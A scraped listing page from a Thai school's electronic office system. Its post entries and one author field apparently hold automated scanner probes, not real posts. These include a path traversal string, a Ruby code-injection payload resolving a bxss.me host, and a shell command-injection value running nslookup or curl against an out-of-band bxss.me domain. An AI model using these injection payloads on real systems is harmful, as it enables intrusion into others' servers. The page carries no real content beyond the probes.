[x] ปิดหน้าต่างนี้
T&T-2018 All rights reserved ระบบสำนักงานอิเล็กทรอนิกส์ ร.ร.กาญจนานุเคราะห์


ผู้เขียน :
17 มี.ค. 2566
^(#$!@#$)(()))******
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
1
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
!(()&&!|*|*|
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
1
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
../1
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
)
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
1
อ่านต่อ...
ผู้เขียน :
17 มี.ค. 2566
"+"A".concat(70-3).concat(22*4).concat(120).concat(83).concat(117).concat(71)+(require"socket" Socket.gethostbyname("hitmd"+"bactuhws4852d.bxss.me.")[3].to_s)+"
อ่านต่อ...
ผู้เขียน : $(nslookup -q=cname hitwkuobebolh63373.bxss.me||curl hitwkuobebolh63373.bxss.me)
17 มี.ค. 2566
1
อ่านต่อ...

จำนวน 48 หน้า   20 21 22 23 24 25 26 27 28 29


ระบบสำนักงานอิเล็กทรอนิกส์ โรงเรียนกาญจนานุเคราะห์ สพม.8
My Office V 6.4 - 2018 Copyright @T&T-2018 All rights reserved.